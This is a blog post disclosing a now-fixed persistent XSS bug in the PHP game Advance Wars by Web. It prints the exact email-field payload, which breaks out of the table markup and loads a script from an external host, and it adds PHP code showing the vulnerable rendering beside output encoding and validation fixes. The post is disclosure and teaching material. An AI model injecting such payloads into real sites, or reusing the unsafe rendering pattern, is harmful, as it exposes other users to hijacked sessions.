AWBW Persistent XSS — Samy is my Hero

This post is a short one: I just feel like recording a small vulnerability I found and reported. Mostly I like my proof of concept, and frankly that’s the real reason I’m writing this.

In fact, skip reading the post and just check out the proof of concept.

Background

AWBW

Advance Wars by Web (aka AWBW) is a web-based, turn-based strategy game based on Nintendo’s Advance Wars. You can read more about that here.

You can tell, just by clicking around on it, that it’s a big pile of PHP. The “guide.php” in that URL is also a pretty big hint.

I don’t play, but when a friend linked it to me, I saw “.php”, which makes my brain immediately want to start typing SQL injection and XSS payloads into the nearest text input.

XSS

If you don’t know what XSS is, Wikipedia has you covered.

Perhaps the most famous XSS in existence is the Samy Worm, which spread to over a million MySpace users.

The Persistent XSS

So, let’s start with the proof of concept I created and sent to the AWBW team:

https://awbw.amarriner.com/profile.php?username=testxs

(web.archive.org link, since it has been fixed)

So, what was the exploit? Entering the following string into the email field:

></td></tr><script src="https://s.ek.gs/s.js"><

And also checking the “display email” tickbox.

Timeline and Fix

The timeline is a bit fuzzy because I was not informed when they fixed it. I believe it’s roughly the following though:

How did they fix it?

They made it so that the “display email” checkbox no longer displays your email anywhere, as far as I can tell. You can still store a persistent XSS payload on your own settings page via the email input, but you can’t get anyone else to view it.

They did also blank out the email field for my test account.
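The root cause is that the stored email was printed straight into the profile table, so the leading `></td></tr>` closed the cell and row and the script tag that followed was parsed as live markup. Below is an added example of how the display side should have been handled: output encoding, with input validation as a second layer. This is not AWBW’s code; the function names and the sample string are my own, and the payload is the one from the post.

```php
<?php
// Added example, not AWBW's code. Shows the unsafe rendering the post describes
// beside a hardened version. Function names are assumptions for illustration.

// Constructed sample: the string the post describes being saved in the email field.
$storedEmail = '></td></tr><script src="https://s.ek.gs/s.js"><';

// Vulnerable rendering: the raw field is dropped straight into the table markup,
// so the "</td></tr>" prefix closes the cell and row and the <script> tag is live HTML.
function renderEmailRowUnsafe(string $email): string
{
    return "<tr><td>Email</td><td>" . $email . "</td></tr>";
}

// Hardened rendering: HTML-encode on output. ENT_QUOTES also covers attribute
// contexts, ENT_SUBSTITUTE replaces malformed UTF-8 instead of returning "".
function renderEmailRowSafe(string $email): string
{
    $escaped = htmlspecialchars($email, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<tr><td>Email</td><td>" . $escaped . "</td></tr>";
}

// Defence in depth at input time: reject anything that is not syntactically an
// email address before it is stored. This does not replace output encoding.
function isAcceptableEmail(string $email): bool
{
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// Cheap regression check for a template review: the profile template itself never
// emits a <script> tag, so one appearing in rendered output means a field leaked through.
function containsLiveScript(string $html): bool
{
    return stripos($html, '<script') !== false;
}

echo "unsafe render contains live script: ";
var_dump(containsLiveScript(renderEmailRowUnsafe($storedEmail)));
echo "safe render contains live script: ";
var_dump(containsLiveScript(renderEmailRowSafe($storedEmail)));
echo "payload passes email validation: ";
var_dump(isAcceptableEmail($storedEmail));
echo "ordinary address passes email validation: ";
var_dump(isAcceptableEmail('player@example.com'));
```

Note that hiding the field, as the AWBW fix did, removes this one sink but leaves the stored payload in place; encoding at every point the value is rendered is what actually closes the bug.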

Conclusion

Typing into text fields is fun, but most of all Samy is my hero.